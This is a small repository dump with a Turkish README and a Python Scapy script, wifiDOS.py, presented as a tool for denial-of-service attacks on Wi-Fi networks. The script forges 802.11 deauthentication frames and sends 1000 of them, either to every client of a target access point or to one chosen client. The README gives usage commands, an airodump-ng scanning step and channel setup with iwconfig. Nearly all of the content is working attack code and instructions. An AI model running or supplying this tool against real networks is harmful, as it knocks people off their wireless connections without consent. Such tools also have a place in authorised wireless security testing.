├── wifidos.png ├── README.md └── wifiDOS.py /wifidos.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/besimaltnok/wifiDOS/HEAD/wifidos.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Wireless DOS with Scapy 2 | 3 | Kablosuz ağlara DOS saldırı gerçekleştirmek amacı ile Scapy ile gerliştirilmiş bir araçtır. 4 | 5 | ![scapydos](https://github.com/besimaltnok/wifiDOS/blob/master/wifidos.png) 6 | 7 | ##### Kullanılabilir Parametreler 8 | 9 | * -m Mode : Saldırı modunu tanımlamak için kullanılmalıdır. (b: Tüm istemcilere saldırı - c : Sadece bir istemciye yönelik) 10 | * -c Client : Saldırı düzenlenecek istemcinin mac adres bilgisi 11 | * -i iface : Saldırıda kullanılacak ve monitor mod durumunda olacak ağ kartı 12 | * -a AP_mac : Saldırı düzenlenecek erişim noktasının mac adres bilgisi 13 | * --help : Yardım görüntülemek amacı ile kullanılabilir. 14 | 15 | 16 | ##### Etraftaki istemcileri analiz etmek için : 17 | 18 | * airodump-ng wlan0 19 | 20 | ##### Örnek Kullanım 21 | 22 | * python wifiDOS.py -m b -a AP_mac -i wlan0 23 | * python wifiDOs.py -m c -a AP_mac -c Client_mac -i wlan0 24 | 25 | 26 | NOT : Erişim noktası ile saldırıyı düzenlemek amacı ile kullandığımız ağ kartı aynı kanalda olmalıdır. 27 | Bunun için : 28 | - iwconfig wlan0 channel kanal_numarası komutunu kullanabiliriz. 29 | -------------------------------------------------------------------------------- /wifiDOS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import logging 4 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 5 | from scapy.all import * 6 | import argparse 7 | 8 | iface = 'wlan0' 9 | 10 | helpme = """ 11 | 12 | Author : Besim ALTINOK ||| Team : CanYouPwnMe 13 | 14 | """ 15 | 16 | parser = argparse.ArgumentParser(description=helpme) 17 | parser.add_argument('-m', action='store', dest='mode', 18 | help='Attack mode') 19 | parser.add_argument('-a', action='store', dest='bssid', 20 | help='Access point mac address') 21 | parser.add_argument('-c', action='store', dest='client', 22 | help='Client mac address') 23 | parser.add_argument('-i', action='store', dest='iface', 24 | help='Interface for attack\n') 25 | args = parser.parse_args() 26 | 27 | 28 | client = args.client 29 | bssid = args.bssid 30 | mode = args.mode 31 | iface = args.iface 32 | broad = "ff:ff:ff:ff:ff:ff" 33 | 34 | if mode == 'c': 35 | print "Send Deauth packet to : ", client, " - AP : ", bssid 36 | deauth = RadioTap() / Dot11(addr1=bssid, addr2=client.lower(), addr3=bssid)/Dot11Deauth() 37 | sendp(deauth, iface=iface, count=1000, inter = .2, verbose=False) 38 | elif mode == 'b': 39 | print "Send Deauth packet to AP: ", bssid 40 | deauth = RadioTap() / Dot11(addr1=broad, addr2=bssid.lower(), addr3=bssid.lower())/Dot11Deauth() 41 | sendp(deauth, iface=iface, count=1000, inter = .2, verbose=False) 42 | --------------------------------------------------------------------------------